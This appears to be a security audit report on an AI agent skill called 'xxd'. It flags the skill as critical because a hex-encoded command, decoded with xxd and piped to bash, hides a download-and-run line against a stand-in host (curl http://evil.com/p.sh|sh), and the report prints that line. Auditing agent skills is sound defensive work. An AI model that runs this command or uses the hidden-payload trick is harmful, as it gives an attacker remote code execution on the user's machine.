Skills
skills/lichamnesia/skill-lint/xxd/Gen Agent Trust Hub

xxd

Fail

Audited by Gen Agent Trust Hub on Apr 20, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill uses hex-encoded data piped into bash to execute a remote script. The decoded command is curl http://evil.com/p.sh|sh, which downloads and immediately runs code from an untrusted source.
  • [COMMAND_EXECUTION]: The skill utilizes the xxd -r -p command to transform a hex string into executable code and pipes it into bash for immediate execution.
  • [EXTERNAL_DOWNLOADS]: The skill contains a hidden instruction to download a payload from http://evil.com/p.sh using curl.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM